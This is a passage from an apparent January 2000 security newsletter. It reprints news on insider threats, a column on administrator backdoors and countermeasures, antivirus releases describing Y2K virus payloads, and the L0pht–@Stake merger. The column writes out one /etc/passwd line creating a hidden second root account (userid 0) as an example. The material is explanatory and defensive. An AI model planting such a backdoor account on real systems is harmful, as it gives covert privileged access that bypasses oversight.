NEW YORK (APBnews.com) -- The greatest
security threat to companies' computer
systems comes from disgruntled employees
stealing confidential information and trade
secrets, according to a new study on
cyber-security.

The survey, conducted by Michael G. Kessler
& Associates Ltd., a New York-based security
firm, found that 35 percent of the theft of proprietary information is
perpetrated by discontented employees. Outside hackers steal secrets 28
percent of the time; other U.S. companies 18 percent; foreign corporations
11 percent and foreign governments, 8 percent. The remaining 10 percent,
according to the study, are listed as miscellaneous crimes.

The financial losses caused by these cyber break-ins totaled $42 million
last year, which is up more than 100 percent from the 1997 figure of $20
million.

'No such thing as a hacker's holiday'

"Computer crime is much more complex than bugs and viruses," said
President and CEO Michael G. Kessler. "Y2K enlightened business
owners to pitfalls in their systems, but there must also be heightened
awareness of the growing number and variety of computer security
breaches that can weaken a company's balance sheet."

The survey was done over the last six months, and written questions were
given to 300 of Kessler's clients and other companies. He said that
disgruntled employees could be capable of taking business records, trade
secrets and payroll information.

"It doesn't take a new millennium for corporate computer piracy to occur,"
said Kessler. "There's no such thing as a hacker's holiday. Internet
invasions increase with growing computer and Internet popularity. Codes
can be cracked; systems will be sabotaged. Hacking is a reality, and
CEOs who have turned a deaf ear to its existence will be shocked when it
happens to their allegedly fail-safe network."

Kessler cautioned that now that Y2K is over, corporations shouldn't be
lulled into a false sense of security.

Hacker attacks not often reported

"Problems could just as easily occur on Jan.
30 as Jan. 1. Businesses should brace for
outbreaks of sophisticated viruses and
hackings from outside and in. Once a breach
in computer security has occurred, our
research historically reveals much more -- a
'subplot' that can alert corporations to the real
root of some serious trouble," said Kessler.

He said companies fail to report computer
break-ins for fear of bad publicity, and that for
every break-in reported, 400 do not.

The Kessler study mirrors previous reports
showing that computer security is one of the
biggest challenges facing corporate America.

Computer-crime rates and information-security
breaches continue to increase, according to a
joint study conducted last year by the
Computer Science Institute and the FBI.

Losses greater than $100 million

The 1999 Computer Crime and Security Survey, based in San Francisco,
polled 521 security professionals at U.S. corporations, government
agencies and universities.

The findings revealed that financial losses among 163 respondents totaled
$124 million, which was the third straight year the survey had recorded
losses greater than $100 million.

"It is clear that computer crime and other information security breaches
pose a growing threat to U.S. economic competitiveness and the rule of
law in cyberspace," said Richard Power, editorial director of the institute.
"It is also clear that the financial cost is tangible and alarming."

System break-ins by outsiders were reported by 30 percent of
respondents, and unauthorized access by insiders was reported by 55
percent.

Technology not enough

Even though security measures, such as digital identification, encryption
and intrusion-detection systems are being used more frequently,
technology itself is not enough to stymie hackers.

The study also found that 98 percent of respondents said they use
anti-virus software, 90 percent reported incidents of virus contamination.
Also, system penetration from outside grew for the third straight year
despite 91 percent of respondents saying they used firewalls.

"The lesson to be learned is simple security technology does not equal a
security program," said Power, suggesting that well-trained, motivated staff
and smart procedures are just as important for security as technology.

Justice Department stepping in

The problem of proprietary information being breached on computer
systems has prompted the Justice Department to devote an entire section
to computer crimes, called the Computer Crime and Intellectual Property
section. In addition, the Economic Espionage Act of 1996 is expected to
be used to prosecute foreign sources of computer crime.

Michael A. Vatis, director of the FBI's National Infrastructure Protection
Center, agrees that a "disgruntled insider" is the principal source of
computer crimes.

"Insiders do not need a great deal of knowledge about computer intrusions,
because their knowledge of victim systems often allows them to gain
unrestricted access to cause damage to the system or to steal system
data. The 1999 Computer Security Institute/FBI report notes that 55
percent of respondents reported malicious activity by insiders," Vatis told a
Congressional committee last year.

Coast Guard lost data

Recent cases of white-collar computer crimes include:

Shakuntla Devi Singla used her insider knowledge and another
employee's password and log-on identification to delete data from a
U.S. Coast Guard personnel database system. It took 115 agency
employees over 1,800 hours to recover and re-enter the lost data.
Singla was convicted and sentenced to five months in prison and five
months home detention and ordered to pay $35,000 in restitution.
Software engineer William Gaed, working for a subcontractor to Intel
Corp., was convicted of illegally downloading secret data on the
computer giant's plans for a Pentium processor worth between $10
million and $20 million. Authorities said Gaed also videotaped
information on his computer screen and planned to sell the tapes to
a competitor. Gaed was sentenced to 33 months in prison.

And, according to a General Accounting Office (GAO) report issued in
October, the federal government has been lax in protecting computer
networks used by government and businesses.

"At the federal level, these risks are not being adequately addressed," the
report said.

U.S. unprepared for information threat

The report showcased concerns of some experts about threats to
private-sector systems that control energy, telecommunications, financial
services, transportation and other critical services.

"Few reports are publicly available about the effectiveness of controls over
privately controlled systems," GAO said.

Currently, there is no strategy to improve government information security,
the GAO report found. If the United States is faced with a threat, the
response could be "unfocused, inefficient and ineffective," wrote Jeffrey
Steinhoff, the acting assistant comptroller general.

David Noack is an APBnews.com staff writer (david.noack@apbnews.com).

@HWA

60.0 Are the Greatest Risks Internal or External? 01/05/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
Who is the biggest risk to your network security? Is it
he cyber intruder trying to knock over your firewall from
the outside? Or is it the trusted employee who already
has the administrative access? Carole Fennelly at Sun
World takes a look at these internal security threats.

Sun World
http://www.sunworld.com/sunworldonline/swol-01-2000/swol-01-security.html

Who gets your trust?

Security breaches can come from those you least suspect

Summary

Systems administrators have extraordinary access to all the data on
corporate systems. What can be done to ensure that your
administrators will not betray that trust? (3,000words)

In the business world you will often hear the statement "We don't hire
hackers." When pressed for a reason, the speaker usually reveals a fear
that a "hacker" will install a back door in the system. Time and time
again, however, I have seen back doors installed by employees or
security professionals whose integrity is never questioned. When
confronted, they usually say it's no big deal. After all, they have the
root password. They just wanted to set up a root account with a
different environment. That's not hacking, right? Wrong. Their
intention did not matter -- the security of the system has been
bypassed.

This article discusses how administrative privileges can be abused and
suggests some methods for countering that abuse. It is not meant to imply
that every administrator abuses privileges or has malicious intent --
just that you shouldn't assume anything.

What is a back door? Quite simply, a back door is a method for gaining
access to a system that bypasses the usual security mechanisms. (Has
everyone seen WarGames?) Programmers and administrators love to stick
back doors in so they can access the system quickly to fix problems.
Usually, they rely on obscurity to provide security. Think of approaching
a building with an elaborate security system that does bio scans,
background checks, the works. Someone who doesn't have time to go through
all that might just rig up a back exit so they can step out for a smoke
-- and then hope no one finds out about it.

In computer systems, a back door can be installed on a terminal server to
provide direct access to the console remotely, saving the administrator a
trip to the office. It can also be a program set up to invoke system
privileges from a nonprivileged account.

A simple back door is an account set up in the /etc/password file that
looks like any other userid. The difference is that this userid doesn't
have to su to root (and it won't show up in /var/adm/sulog) -- it already
is root:

auser:x:0:101:Average User :/home/auser:/bin/ksh

If you don't see it, look again at the third field (userid) and compare
it to the root account. They are the same (0). If you are restricting
direct root logins to the console only (via /etc/default/login), then
this account will have the same limitation. The difference is that if
someone does su to this account, it will not be apparent in
/var/adm/sulog that it is root. Also, a change to the root password will
not affect the account. Even if the person who installed the account
intends no harm, he or she has left a security hole.

It is also pretty common for an administrator to abuse the /.rhosts file
by putting in desktop systems "temporarily." These have a way of becoming
permanent.

Back doors can also be set up in subtler ways though SUID 0 programs
(which set the userid to root). Usually, the motivation for setting up
back doors is one of expediency. The administrator is just trying to get
a job done as quickly as possible. Problems arise later when either (1)
he leaves under normal circumstances and the hole remains or (2) he
leaves under bad circumstances and wants revenge.

Proprietary data A manager may also be reluctant to hire "hackers" for
fear that they may divulge proprietary information or take copies of
proprietary data. Several years ago, I was consulting at a company when a
new administrator joined the group. In an effort to ingratiate himself
with the team, he confided that he had kept the backup tapes from his old
job (a competitor) and that they had some "really cool tools." It so
happened that a consultant with my own business worked at the
competitor's site. A scan of the tape revealed the proprietary software
that the administrator had been working on, which eventually sold for a
significant amount of money. While the admin probably did not intend to
steal the software, his actions could have left his new employer facing a
large lawsuit -- all for the sake of a few shell scripts. In this
particular case, no one believed that the administrator had any ulterior
motives. I wonder if people would have felt that way if he had been a
"known hacker"?

System monitoring Administrators are supposed to monitor system logs. How
else can problems be investigated? But there is a difference between
monitoring logs for a legitimate reason and monitoring them to satisfy
prurient curiosity. Using the system log files to monitor a particular
user's behavior for no good reason is an abuse of privileges.

What is a good reason? Your manager asks you to monitor specific logs. Or
maybe you notice suspicious activities, in which case you should inform
the management. Or, more commonly, a user complains about a problem and
you are trying to solve it. What is a bad reason? A user ticks you off
and you want to see how he is spending company time. Or a user has a
prominent position in the company and you want to know what kinds of
Websites she goes to.

Countermeasures You can take some actions to ensure the integrity of
privileged users, but none of them carries any guarantee.

Background checks You can have an investigative agency run a background
check on an individual and you can require drug tests. These tell you
only about past behavior (if the individual has been caught).

The state of New Jersey (where I live) has adopted a law commonly
referred to as Megan's Law (see Resources). The law mandates that a
community be notified of any convicted sex offender living in the
community. On the surface, it sounds like a great idea and a way to
protect children from predators.

As a parent, I am particularly sensitive to crimes against children. I
received a Megan's Law notification this past year about a convicted sex
offender who moved into town. It did not change a thing for me. My
feeling is that every child molester has to have had a first time and
that in any case not all molesters have been identified. Therefore, I
take appropriate precautions with my children, regardless of who has
moved to the area.

In the technical field, hackers are considered the molesters. (Yes, I
know all about the politically correct terms cracker, defacer, etc., but
the common term these days is hacker.) How do you know if someone is a
"hacker"? Some people try to refine the term to mean "someone who has
been convicted of a computer crime." But let's say, for example, that you
attend Defcon, the hackers' conference, and encounter an intelligent job
seeker with bright blue hair and funky clothes. Would you hire him?
Chances are that you would at least scrutinize his credentials and make
sure your contract spelled out all details of the work to be performed
and the legal repercussions for any violations. What if the same person
showed up for an interview with the blue dye rinsed out and in a nice
pressed suit? Be honest: would you perform the same background checks
regardless of a person's appearance?

Technical measures Some technical software packages can limit or control
superuser privileges. I recommend using them to prevent the inadvertent
abuse of superuser privilege. Unfortunately, knowledgeable administrators
and programmers with privileged access will be able to circumvent these
measures if they really want to.

sudo The freely available sudo package provides more granular
control over the system by restricting which privileged commands can
be run on a user basis. See Resources for the Sudo main page, which
has a more complete description.

Tripwire Tripwire is a file integrity package that, following the
policy determined by the administrator, reports any changes made to
critical files. Tripwire was originally developed at Purdue
University by Gene Kim under the direction of Eugene Spafford. I
plan to evaluate the merits of the commercial version of Tripwire in
a future column. Tripwire is a good way for an administrator to tell
whether the system files or permissions have been modified.

What can be done, however, if the senior administrator who monitors
the system has malicious intent?

Professionalism The best defense against the abuse of administrator
privileges is to rely on a certain level of professionalism. The medical
Hippocratic oath includes the mandate Do No Harm. While there is no such
professional oath for systems administrators, you can establish
guidelines for acceptable behavior. During the mid-1980s, I worked as an
administrator in a computer center at a large telecommunications research
facility. We had a code of ethics that a user had to sign before an
account could be installed. We also had a code of ethics for privileged
users that included additional restrictions, such as:

No SUID 0 (set userid to root) programs will be installed without
the consent, in writing, of the senior administrator.

All users' email is to be considered private and confidential and
may not be read by anyone other than the intended recipient.

Users' files may not be modified or read except in the case of a
predetermined problem or security investigation. Be prepared to
justify.

Privileged users are often entrusted with sensitive information,
such as an employee termination, before other employees. This
information is to be kept confidential.

The root passwords are changed monthly and are to be distributed by
the senior administrator only. The passwords must be kept in a safe
location, such as your wallet. If the password is lost, notify the
senior administrator or your manager immediately.

Keystroke monitoring of user activities is strictly prohibited
without senior management approval, in writing.

All administrative procedures and tools are to be considered
proprietary information and are the property of the computer center.

Tape archives may not be removed from the facility without written
approval.

Discretion A code of ethics for privileged users should not be considered a
punitive device, but rather a statement about the integrity of the person
who signs it. At one point during my years in the computer center, the
secretary to the president of the company came to me with a printer
problem. As I was assisting her, she became upset when she realized that
the test job she had sent to the printer was highly confidential. I was
able to reassure her that all administrators were bound by a code of ethics
and would be terminated for violations. (Besides, I wasn't really reading
it, I was just looking for garbage characters!) Professionals must
establish a certain level of trust. This is especially important for those
privy to sensitive information regarding terminations or investigations.

Final thoughts Would I hire someone who showed up for an interview with
blue hair, body piercings, and a name like 3v1l HaK0rZ? No. Not because he
might install a back door, but because he was ignorant about what was
acceptable on Wall Street. As for the back doors? More are installed by
well-groomed "professionals" in suits than by "hackers." Anyone with the
required skills can be either a "security consultant" or a "hacker." The
only difference is the label.

Disclaimer: The information and software in this article are provided as-is
and should be used with caution. Each environment is unique, and readers
are cautioned to investigate, with their companies, the feasibility of
using the information and software in this article. No warranties, implied
or actual, are granted for any use of the information and software in this
article, and neither the author nor the publisher is responsible for any
damages, either consequential or incidental, with respect to the use of the
information and software contained herein.

About the author Carole Fennelly is a partner in Wizard's Keys Corporation,
a company specializing in computer security consulting. She has been a Unix
system administrator for almost 20 years on various platforms and of late
has focused on sendmail configurations. Carole provides security
consultation to several financial institutions in the New York City area.

@HWA

61.0 Japanese Firms Turn To Security After Y2K 01/05/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
With the conclusion of many Y2k efforts many Japanese
companies will be turning those resources onto
increasing the security of their computer systems. A
survey conducted by Nikkei Internet Technology of
major Japanese firms indicated that resources will now
be applied to creating more secure systems.

Asia Biz Tech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/news/90770

Japanese Firms to Boost Net System Security after Y2K Issue Subsides

December 29, 1999 (TOKYO) -- Japanese corporate efforts geared toward Y2K software
readiness will soon conclude, and many companies will then focus on constructing better
Internet systems.

Nikkei Internet Technology conducted a survey in October and November on Japanese
companies to ascertain what kind of Internet technologies and systems they seek to put in
place and what kind of measures they are taking to counter computer viruses and cases of
unauthorized access. The following is a brief overview of the survey results.

The respondents of the survey are companies listed on the first and second sections of
the Tokyo Stock Exchange, the Osaka Securities Exchange and the Nagoya Stock
Exchange, which have their own home pages, as well as unlisted companies with sales of
at least 30 billion yen a year. (102.90 yen = US$1)

Nikkei Internet Technology sent questionnaires to more than 2,600 companies and about
900 of them responded to the questionnaire.

The findings indicate that about 80 percent of the respondents said they had introduced
the Internet prior to 1997. However, their access environment is not on a satisfactory level
yet, as the Internet-access speed for about 95 percent of them was 1.5Mbps or slower.

Nikkei Internet Technology was surprised to learn the survey results on corporate
experiences in the area of computer viruses. The survey discovered that 90 percent of the
respondents said they have been infected with viruses.

In fact, the editorial department of Nikkei Internet Technology also discovered its system
was infected with computer viruses a few times in the past several months. In one case,
our computers were infected with a virus through a news release in the form of an
attached file on Microsoft Word software. All of our staffers use antivirus software and
update a pattern file of the software regularly so that the software can handle any new
types of virus. We can see the importance of taking regular measures to prevent virus
infections.

According to the survey findings, 66 percent of the companies said all of their employees
use antivirus software and 94 percent of them said some of their employees do so. We
believe that there will be a growing need to introduce such prevention measures against
computer viruses.

Meanwhile, only about 20 percent of the respondents said they have had unauthorized
access from outside. Although we have not analyzed the results in detail yet, we found
that a few companies have actually suffered damage resulting from intrusions. Some firms
have reported that they had their ports scanned by someone. It is obvious that Japanese
companies need to address issues of unauthorized access.

Slightly fewer than 25 percent of the companies said they have already introduced a tool
that detects vulnerable areas in system security, the survey finds. However, more than 40
percent of them said they do not plan to introduce such a tool or they don't know if they
will do so soon. We found that it will be inevitable for these companies to introduce such
new systems as Internet VPN, encryption mail and Single Sign-on and to adopt preventive
measures against computer viruses and cracking.

(Norio Inaba, Editor-in-Chief, Nikkei Internet Technology

@HWA

62.0 Virus FUD Continues 01/05/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
After forecasting 30,000 new viruses to attack on
January 1, the mainstream media seems to be still
playing up the Virus angle. Basically they all say that 'No
viruses for Y2K, but they might still arrive.' The FUD
factor in some of these articles is amazing. Yes, Viruses
are a threat, but they are no more a threat today than
they where last week.

The Straits Times - No virus attacks on computers on Jan 1
http://www.straitstimes.asia1.com/cyb/cyb1_0105.html

Yahoo News - Trend Micro Discovers 14 New Viruses
http://biz.yahoo.com/bw/000103/ca_trend_m_1.html

Sydney Morning Herald - Bug-free so far, but virus may lurk
http://biz.yahoo.com/bw/000103/ca_trend_m_1.html

Australian Financial Review - New computer viruses crop up with year 2000
http://www.afr.com.au:80/content/000104/update/update44.html

Excite News - NAI Recommends Continued Caution
http://news.excite.com:80/news/pr/000103/ca-network-assoc-y2k

Straits Times;
404

Yahoo News;

Monday January 3, 8:04 am Eastern Time

Company Press Release

Trend Micro Discovers 14 New Viruses/Worms During Y2K Rollover

Provides Monday Morning Tips for Computer Users

Trend Micro Recommends Monday Morning Precautionary Measures to Help
Computer Users Minimize Risk of Virus Outbreaks

CUPERTINO, Calif.--(BUSINESS WIRE)--Jan. 3, 2000-- Trend Micro Inc.
(Nasdaq:TMIC - news; Japan OTC:4704), a leading provider of Internet
virus protection, today announced discovery of fourteen (14) new
viruses over the Millennium weekend by its special Y2K virus watch
eDoctor(TM) engineers, who have been working 24x7 since December
15th in anticipation of increased virus activity leading up to Y2K.
Four (4) of these new viruses had Y2K-associated trigger dates or
messages associated with them.

During this same time period, six (6) viruses were detected at
customer sites in North America. Trend Micro has updated its virus
definition files to defend against all fourteen of these newest
computer virus threats and advises computer users to update their
virus protection software first thing Monday morning to ensure
protection and to use extra caution when opening email attachments.
At the time of writing, these viruses are not considered a serious
threat.

During the past seven days, Trend Micro's World Virus Tracking Center
recorded more than 4,000 infected computer systems worldwide. The World
Virus Tracking Center at http://wtc.trendmicro.com/wtc/, monitors in
real time the activity and travel patterns of viruses worldwide. Figures
are based on the scanning results of users worldwide who surf to Trend
Micro's web site and use its free on-line virus scanning tool,
HouseCall(TM), to scan and rid their computers of viruses.

Viruses discovered at customer sites from December 31 to

January 2 include:

-- W97M_Chantal.B -- (Y2K VIRUS) a destructive Word 97 macro virus
that infects documents and templates and also tries to delete all
files in c:\ drive. Similar to W97M_Chantal.A, W97M_Chantal.B has
the same payload, which triggers on the 31st day of the month and
displays a message box with the following content:
"Y2K is Coming Soon..." .

-- VBS_LUCKY2000 -- (Y2K VIRUS) an overwrite-type worm that is
written in Visual Basic Script. Once executed it overwrites files
in the same directory with itself and makes them 866 bytes in
size. Then it creates a shortcut on the desktop, which points to
a web site in Russia. Once the URL is created, it tries to
connect to that web site using the default browser.

-- TROJ_WINKILL (a.k.a. Trojan.KillInst98, Inst98,
Trojan/Kill_Inst98) -- a DOS Trojan is a compressed file that upon
execution if certain conditions are met will delete all files in
the c:\ directory. When the Trojan is run it executes a command
that turns off the confirmation and the output is not seen by the
user. As a result, the user is not able to notice that the files
have been deleted.

-- PE_CRYPTO -- a memory resident PE-file infector that tries to hide
its presence by using an encryption mechanism. This virus also
deletes antivirus related files to avoid detection. Upon
execution, PE_CRYPTO drops kernel32.dll and wininit.ini files.
Upon boot up, the original kernel32.dll is replaced by the one
dropped by the virus. After that the virus tries to infect others
files, also adding encryption to all newly infected files. Since
the dll file is loaded upon restart, the virus becomes memory
resident and is executed each time the computer is rebooted.

-- VBS_BUBBLEBOY (a.k.a. BUBBLEBOY WORM) -- attained much notoriety
in the press because it is the first virus discovered that
doesn't require the user to click on an attachment in order to
activate. BubbleBoy arrives in an email with a Subject line that
reads "BubbleBoy is back!" The message contains an invalid URL
ending in "bblboy.htm" and the message text "The BubbleBoy
Incident, pictures and sounds." When executed, the worm will try
to email itself to every contact in the user's address book. It
also goes into the registry and changes the system's registered
owner to "BubbleBoy" and the organization to "Vandelay
Industries."
-0-

Y2K viruses discovered from December 31 to January 2 include:

-- TROJ_ZELU -- a trojan pretending to be a Y2K checking software
(Y2K.EXE), TROJ_ZELU that in fact, does not fix any Y2K bugs.
Instead, it goes through all drives and deletes files. As it does
so, it displays the following text: "This file is sick ! It was
contaminated by the radiation liberated by the explosion of the
atomic bomb." TROJ_ZELU does not infect other files and it does
not reside in memory. This trojan is not in the wild at present
and has not been spotted at any customer sites.

-- W97M_VALE.A -- a macro virus that can infect all Windows
platforms. This virus does not have a dangerous payload and is
currently not in the wild. Once a system is infected, W97M_VALE.A
uses IRC servers to send an infected file to chat users. This
virus also has various trigger dates (May 19, Sept. 20, Dec. 25,
Jan. 1) and displays different messages on different dates. It
also hooks various macro functions to drop files called MONEY.DOC
and DINHEIRO.DOC to the c:\Windows directory, displays messages
in the Office Assistant, and modifies the registry to reduce
Office 2000's security level. The virus author intended to have
W97M_VALE.A spread via Outlook, but this payload does not work.

-- W97M_Chantal.B -- (described above)

-- VBS_LUCKY2000 -- (described above)

Monday morning steps to take to minimize risk of infection:

Trend Micro urges all computer users to take the following precautionary
measures when booting up their computers on Monday morning to minimize
risk of virus infection.

-0-

-- Update virus protection software -- Before opening any documents
or checking email, users should be sure to update their virus
protection software to ensure protection against viruses
discovered during the Y2K rollover. Trend Micro customers should
update to Pattern File 637, which includes protection against all
of the 14 new viruses.

-- Avoid opening any suspicious or unexpected email attachments --
Don't take unnecessary chances by opening email attachments sent
by individuals you don't know, or by opening email attachments
from users you do know that you were not expecting. If you have a
suspicious file or think you might have a virus, email it to
virus_doctor@trendmicro.com for our team of virus doctors to
review. This is a free service provided by Trend Micro.

-- Save all email attachments to a local drive before opening --
Desktop virus protection does not scan email attachments if they
aren't first saved to a local drive. Ensure all email attachments
are scanned by virus protection software by saving them to local
drive before opening them.

-- Use free online virus scanners -- If you haven't invested in
desktop virus protection, use a free online virus scanner, like
Trend Micro's HouseCall at http://housecall.antivirus.com, to
scan and rid your computer of viruses. Remember, online scanners
can't protect you from viruses lurking in unopened email
attachments. They can only scan files already on your system. If
you are relying on an online scanner, save all email attachments
to a local drive before opening them and then use HouseCall to
scan them all at once.

-- Set Browser and Windows Security Settings to Medium or High --
This will prevent certain script viruses from automatically
executing. To set security to high, go to Tools/ Internet
Options. Click the security tab and select high security. Trend
also strongly advises that users get the latest security patches
from Microsoft. Users with Microsoft's Internet Explorer 5.0 can
go to Tools/ Windows Update to get the latest patches and
plug-ins.

More information about all of these viruses and worms can be obtained
from Trend Micro's special Y2K Virus Watch site, http://www.y2kvirus.com.

About Trend Micro

Trend Micro provides centrally controlled server-based virus protection
and content-filtering products and services. By protecting information
that flows through Internet gateways, email servers, and file servers,
Trend Micro allows companies and managed service providers worldwide to
stop viruses and other malicious code from a central point before they
ever reach the desktop.

Trend Micro's corporate headquarters is located in Tokyo, Japan, with
business units in North and South America, Europe, Asia, and Australia.
Trend Micro's North American headquarters is located in Cupertino, CA.
Trend Micro's products are sold directly and through a network of
corporate, value-added resellers and managed service providers. Evaluation
copies of all of Trend Micro's products may be downloaded from its
awarding winning web site, http://www.antivirus.com.

Note to Editors: eDoctor and HouseCall are trademarks of Trend Micro
Incorporated. Other product and company names may be trademarks of
their respective owners.

Contact:

Trend Micro Inc.
Susan Orbuch, 408/257-1500 Ext. 6362
susan_orbuch@trendmicro.com
or
Asia:
Kristin Zoega, +886-2-2378-9666 Ext. 418
kristin_zoega@trend.com.tw
or
Europe:
Donna Rennemo, +47 22 86 24 43
donna_rennemo@trendmicro.com

-=-

Australian Financial Review;

New computer viruses crop up with
year 2000

Several new computer viruses appeared during the last
days of 1999 and the first weekend of 2000, anti-virus
software makers said today.

The software maker Trend Micro detected 14 viruses,
four of which were triggered with the passage to the year
2000 (Y2K) or post messages tied to this changeover. Six
of the viruses were discovered by business clients in North
America, the firm said.

The viruses pose no serious threat for the moment, Trend
Micro said, adding however that some 4,000 computer
systems have been affected worldwide in the past seven
days.

Jeffrey Carpenter, from Computer Emergency Response
Team's virus surveillance centre at Carnegie Mellon
University, said the volume of viral incidents tied to Y2K
have been near that found on an average day - 30.

Among the new viruses, "Feliz.Trojan" from Portugal can
destroy several operating files on a computer hard drive,
leaving the machine inoperable. However, unlike other
viruses, this one cannot multiply, software maker
Computer Associates said. Once the files are destroyed,
an image pops on the screen with the message "Feliz ano
novo" or "Happy New Year" in Portuguese.

When the computer user clicks on the "exit" icon, a series
of messages appear in Portuguese and the command is
executed, leaving the computer unable to boot up again,
Computer Associates, which makes an anti-virus program,
said.

Another virus, Troj.Zelu, claims to fix Y2K problems but
can actually destroy all files on an infected machine, the
firm said. And Lucky2000 virus replaces all the files with
its own code and carries a link to a Web site in Russia.

Trend Micro said the Chantal.B virus, which is activated
the 31st day of every month, also can destroy all hard
drive files. It posts the message "Y2K is coming soon ..."

Other viruses are spreading by the traditional e-mail path.

In Finland, mobile phone giant Nokia said it closed its
internal e-mail system to prevent further damage from the
"ExploreZip worm virus" which had infected computer
systems of several large international companies, the
Helsinki business paper Taloussanomat reported Monday.

A spokeswoman said they believe the virus caused little
damage. It entered their systems on Wednesday and was
stopped on Thursday.

Another e-mail virus, "Armagidon," will replace the
computer's cursor with another symbol.

AFP

Excite News;

Network Associates Recommends Continued Caution as Corporations Return to
Work After Quiet Y2K Weekend

Continued Vigilance Necessary Even After Uneventful New Year's Holiday As
Potential Viruses May Be Lurking in Email for Returning Employees Updated
6:00 AM ET January 3, 2000

SANTA CLARA, Calif., Jan. 3 /PRNewswire/ -- Network Associates, Inc.
(NASDAQ:NETA) today reminded companies and consumers of the need for
continuing "safe computing" practices as they return to work after the New
Year's holiday. Recognizing that the limited virus threat throughout the
holiday may result in a feeling of false security, Network Associates
reminds IT Managers that the potential for damage from new viruses or
security holes still exists. Network Associates' McAfee AVERT (Anti-Virus
Emergency Response Team) will remain in high alert posture for the next 72
hours, as the majority of computers worldwide are powered up for the first
time this millennium on the morning of January 3.

"We are pleased that the New Year's holiday did not pose any strong threats
to our customers, as the potential for Y2K damage was very real," said Sal
Viveros, director for McAfee Total Virus Defense at Network Associates.
"However it is essential for corporations to stay on top of virus happenings
and be especially alert this week as computers are re-booted, and email
between users and the outside world begins to flow freely again."

"Melissa was one of the most destructive viruses of 1999. This virus spread
at lightening speed through email attachments. It was discovered on a Friday
morning, and had spread world-wide within six hours," said Jimmy Kuo,
director of AVERT anti-virus research. "Because these viruses can strike at
any time, and the threat continues, this week AVERT will staff the
CyberAssurance National Information Center, which is part of the President's
Council on the Year 2000 Conversion Information Coordination Center."

From December 30 through the turnover to the new year, McAfee AVERT
researchers found seven low-risk viruses, which represents the average
amount of virus writing activity AVERT usually experiences during a four-day
timeframe. There has been no indication that these seven viruses are
actively spreading in customer sites at this time. Nevertheless, AVERT's
worldwide research and support team will continue to monitor for the spread
of these viruses as well as any new viruses released during the New Year.
For details on the seven new viruses as well as continued updated
information on newly discovered Y2K viruses, visit the AVERT Web site at:
http://vil.nai.com/villib/alpha.asp.

Network Associates is recommending continued caution during the week of
January 3, 2000, suggesting that users adhere to the following guidelines to
protect against viruses.

1. Be wary of emails from unfamiliar senders. 2. Don't double-click on
email attachments -- save and scan them first 3. Keep software updated.
4. Turn on Macro Virus Protection. 5. Be cautious with free downloads.
6. Guard your personal and financial information. 7. Protect your
personal computer. 8. Protect your passwords. 9. Teach children online
safety tips. 10. Protect online transactions by using a secure browser.
11. Bonus tip: Be careful -- but don't believe everything you hear.

The McAfee Total Virus Defense suite provides comprehensive anti-virus
protection at the desktop, file server, groupware server and Internet
gateway. Powerful integrated management tools make it easy for
administrators to deploy updates and upgrades, and to configure and monitor
virus security enterprise- wide. The McAfee Total Virus Defense product line
is sold as a standalone suite and as part of the Net Tools Secure suite,
Network Associates' comprehensive security suite incorporating anti-virus,
firewall, encryption, authentication, intrusion detection, vulnerability
assessment, and security management.

Network Associates' McAfee AVERT (Anti-Virus Emergency Response Team), a
division of NAI Labs, is the largest network of virus researchers in the
industry. During the week of January 3, AVERT will continue to work 24X7
around the globe to provide the latest in virus research and anti-virus
solutions.

With headquarters in Santa Clara, Calif., Network Associates, Inc. is a
leading supplier of enterprise network security and management software.
Network Associates' Net Tools Secure and Net Tools Manager offer best-of-
breed, suite-based network security and management solutions. Net Tools
Secure and Net Tools Manager suites combine to create the Net Tools
solution, which centralizes these point solutions within an easy-to-use,
integrated systems management environment. For more information, Network
Associates can be reached at 972-308-9960 or on the Internet at
http://www.nai.com.

NOTE: Network Associates, McAfee, Total Virus Defense, VirusScan and Net
Tools are registered trademarks of Network Associates, Inc. and/or its
affiliates in the United States and/or other countries. All other registered
and unregistered trademarks in
this document are the sole property of their respective owners.

@HWA

63.0 L0pht Merges With @Stake, Receives Funding 01/06/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Mudge
The renowned hacker think tank L0pht Heavy Industries
has merged with the newly formed internet security
services company @Stake, Inc. @Stake has assembled
a diverse team of extreme talent from premier
organizations including Forrester Research, the L0pht,
Cambridge Technology Partners, and Compaq Computer.
Mudge, from the L0pht, has said that @Stake's vendor
neutrality, combined with open lines of communication
allows the L0pht to remain true to their roots which is
focused on security research and execution which
shatters industry myths and builds a totally new
standard. @Stake executives will be participating in the
major security trade show, RSA 2000, scheduled for
January 16-20 in San Jose.

Press Release
http://www.hackernews.com/press/l0phtmerg.html

@Stake Inc.
Http://www.atstake.com

L0pht Heavy Industries
http://www.l0pht.com/

Boston Globe
http://www.boston.com/dailyglobe2/006/business/Computer_security_firm_born_from_alliance+.shtml

Associated Press - via San Jose Mercury News
http://www.sjmercury.com/svtech/news/breaking/ap/docs/61092l.htm

Reuters - via Excite
http://news.excite.com/news/r/000106/00/net-atstake-security

MSNBC
http://www.msnbc.com/news/353999.asp

Press release:

Top Executives from Forrester Research, Cambridge
Technology Partners, and Compaq Establish @Stake;
Specialized Internet Security Services Firm

The L0pht, renowned 'hacker
think-tank,' to join @Stake

Receives $10 million in Initial Backing from
Battery Ventures

Cambridge, Mass., January 6, 2000 - A group of top
Internet executives announced today the establishment of
@Stake Inc., a specialized professional services firm that
will provide a full range of security solutions for the
e-commerce operations of global clients. @Stake
represents the industry's only independent security
services provider.

@Stake also announced that renowned hacker think-tank
the L0pht has merged with the newly formed company.
This strategic move reflects the firm's commitment to build
a world-class team of professionals offering
non-traditional, e-commerce-age security solutions for
clients.

In addition, the company disclosed that it has received
over $10 million in initial funding from Battery Ventures, a
leading high tech venture capital firm whose other
investments include Akamai Technologies, InfoSeek, and
Qtera. @Stake is the first company spawned from
Battery's newly created in-house incubator program.

"@Stake's independence and dedicated focus on Internet
security differentiate their approach from other providers,"
according to Tom Crotty, general partner at Battery
Ventures. "They have assembled a diverse team of
extreme talent from premier organizations including
Forrester Research, the L0pht, Cambridge Technology
